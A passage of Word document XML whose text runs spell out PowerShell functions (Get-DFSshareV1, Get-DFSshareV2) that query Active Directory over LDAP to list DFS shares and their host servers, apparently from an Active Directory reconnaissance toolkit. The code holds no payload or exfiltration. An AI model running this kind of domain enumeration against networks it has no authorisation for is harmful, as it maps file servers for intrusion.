    <w:p w14:paraId="05F89D93" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC1CA53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7B9549" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661B0821" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3613C882" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFFF9FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A266C27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7F0FD6B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAC9C9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02014287" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0561E274" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [ValidateRange(1,10000)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17393278" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0851E427" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AA6A19" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4CB50C92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B02A22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794D462C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2489EE70" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5A8CFA41" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $DFSsearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6978F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="02525E0C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($DFSsearcher) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEE9C65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DFSshares = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F2A4B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DFSsearcher.filter = "(&amp;(objectClass=fTDfs))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA5B8AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="43AAA787" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E9C86E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results = $DFSSearcher.FindAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BAC408" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FF36DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Properties = $_.Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E84221" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $RemoteNames = $Properties.remoteservername</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403DCC6C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Pkt = $Properties.pkt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD81C4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="06C2CAB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $DFSshares += $RemoteNames | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E74A95" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39252540" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            if ( $_.Contains('\') ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6112CA1C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_.split("\")[2]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E0876A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B7AEEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BE5D2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2708EE66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            Write-Verbose "Error in parsing DFS share : $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAE863D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E609B10" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B29AAE7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588E1D95" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F11C9C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $DFSSearcher.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4876994E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="08E42027" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                if($pkt -and $pkt[0]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B23157" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Parse-Pkt $pkt[0] | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791BA0C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # If a folder doesn't have a redirection it will</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F4121E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # have a target like</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3567CD4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # \\null\TestNameSpace\folder\.DFSFolderLink so we</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C2351" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # do actually want to match on "null" rather than</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2023CF8A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # $null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DDB74E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if ($_ -ne "null") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCDDA78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5042EABC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32341087" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126AE9E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9C1B1C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C8D2FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50534199" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Warning "Get-DFSshareV1 error : $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250876EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C754F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DFSshares | Sort-Object -Property "RemoteServerName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A134CAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2170F3CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05458B04" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="57F2CAE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    function Get-DFSshareV2 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185DFCF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BD9645" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3AC469" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058DC6D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B11DFA7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="67BDD053" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EDE501" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7743EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0676094F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794FDB4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079D6E13" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D94727E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F93055" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBFD737" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B02482" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3E7583AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D48F4F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E96F68" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4063C8EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4F1F9492" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DFSsearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09937D88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7A4391BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($DFSsearcher) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3AD681" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DFSshares = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2543DA6C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DFSsearcher.filter = "(&amp;(objectClass=msDFS-Linkv2))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371F269E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DFSSearcher.PropertiesToLoad.AddRange(('msdfs-linkpathv2','msDFS-TargetListv2'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41195CE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="050D09A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6037B39D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results = $DFSSearcher.FindAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F28279" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19844024" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Properties = $_.Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019D52F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $target_list = $Properties.'msdfs-targetlistv2'[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B837AF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $xml = [xml][System.Text.Encoding]::Unicode.GetString($target_list[2..($target_list.Length-1)])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E10E491" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $DFSshares += $xml.targets.ChildNodes | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791D72AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C4E023" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                            $Target = $_.InnerText</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D78CA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            if ( $Target.Contains('\') ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383B0EAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $DFSroot = $Target.split("\")[3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAEC4EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $ShareName = $Properties.'msdfs-linkpathv2'[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C5E69B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                New-Object -TypeName PSObject -Property @{'Name'="$DFSroot$ShareName";'RemoteServerName'=$Target.split("\")[2]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2CA3B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0191BAC4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB69A6A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4EAA9A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            Write-Verbose "Error in parsing target : $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF3AFEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B1436F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7874CA78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338852EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE25FB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $DFSSearcher.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7D93A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E95D6F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15649A39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Warning "Get-DFSshareV2 error : $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7D440A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A80A7A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DFSshares | Sort-Object -Unique -Property "RemoteServerName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A6B1CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FFEA41" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CA7EDA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="047156BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $DFSshares = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B18D5C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="52CDA2E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if ( ($Version -eq "all") -or ($Version.endsWith("1")) ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EE9A69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DFSshares += Get-DFSshareV1 -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA66D9C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C7CDBF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    if ( ($Version -eq "all") -or ($Version.endsWith("2")) ) {</w:t>
      </w:r>
    </w:p>
